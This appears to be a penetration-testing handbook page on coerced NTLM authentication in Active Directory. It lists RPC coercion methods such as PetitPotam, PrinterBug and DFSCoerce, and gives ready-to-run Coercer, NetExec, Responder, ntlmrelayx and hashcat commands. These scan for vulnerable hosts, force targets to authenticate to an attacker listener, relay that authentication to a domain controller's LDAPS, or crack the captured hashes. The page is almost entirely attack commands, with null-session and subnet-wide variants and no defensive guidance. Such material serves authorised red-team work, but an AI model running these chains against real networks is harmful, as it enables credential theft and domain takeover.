Handbook

Coerced Auth

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Attack Flow

plain text
Attacker calls vulnerable RPC function on target (with valid creds)
→ specifies attacker IP as callback address
→ target authenticates outbound to attacker
→ Capture (Responder) or Relay (ntlmrelayx)

Requirements

  • Valid domain credentials - low privilege sufficient for most methods
  • Listener ready before coercion is triggered

Coercion Methods Reference

MethodProtocolNotes
PrinterBugMS-RPRNOldest, frequently patched on DCs
PetitPotamMS-EFSRWorks unauthenticated on unpatched hosts
DFSCoerceMS-DFSNMAlternative when PrinterBug/PetitPotam patched
ShadowCoerceMS-FSRVPTargets VSS, less commonly patched
MSEvenMS-EVENUseful when other methods blocked

Tools

  • Coercer - pip install coercer, https://github.com/p0dalirius/Coercer
  • nxc coerce_plus module — preferred, simpler syntax, works with some null sessions

Step 1 - Scan for Vulnerable Methods

bash
coercer scan -t <target-ip> -u <username> -p <password> -d <domain.local>

coercer scan -t <subnet>/24 -u <username> -p <password> -d <domain.local>

coercer scan -t <dc-ip> -u <username> -p <password> -d <domain.local>

nxc smb <target-ip> -u <username> -p <password> -M coerce_plus

Step 2 - Set Up Listener First

Option A - Capture (Responder):

bash
sudo responder -I <interface> -dw

# LM downgrade attempt
sudo responder -I <interface> --lm

Option B - Relay (ntlmrelayx):

bash
# Relay to LDAP — most impactful when coercing a DC
impacket-ntlmrelayx -t ldaps://<dc-ip> -smb2support --no-dump

# Relay to SMB
impacket-ntlmrelayx -tf targets.txt -smb2support

Step 3 - Trigger Coercion

NetExec (preferred):

bash
nxc smb <target-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>

# Null session attempt
nxc smb <target-ip> -u '' -p '' -M coerce_plus -o LISTENER=<attacker-ip>

# Subnet-wide
nxc smb <subnet>/24 -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>

Standalone Coercer:

bash
coercer coerce -l <attacker-ip> -t <target-ip> -u <username> -p <password> -d <domain.local>

coercer coerce -l <attacker-ip> -t <target-ip> -u <username> -p <password> -d <domain.local> -v

coercer coerce -l <attacker-ip> -t <dc-ip> -u <username> -p <password> -d <domain.local> -v

Full Attack Chains

Chain 1 - Capture and Crack:

bash
sudo responder -I <interface> -dw

nxc smb <target-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>

hashcat -m 5600 captured_hash.txt <wordlist>

Chain 2 - Coerce DC and Relay to LDAP:

bash
impacket-ntlmrelayx -t ldaps://<dc-ip> -smb2support --no-dump

nxc smb <dc-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>

Flag Reference

Coercer

FlagMeaning
scanTest for vulnerable methods without triggering auth
coerceActively trigger authentication
-t <ip>Target IP
-l <ip>Attacker listener IP
-u / -p / -dCredentials and domain
-vVerbose — shows which RPC method succeeded

nxc coerce_plus

FlagMeaning
-M coerce_plusLoad module
-o LISTENER=<ip>Attacker IP for target to authenticate toward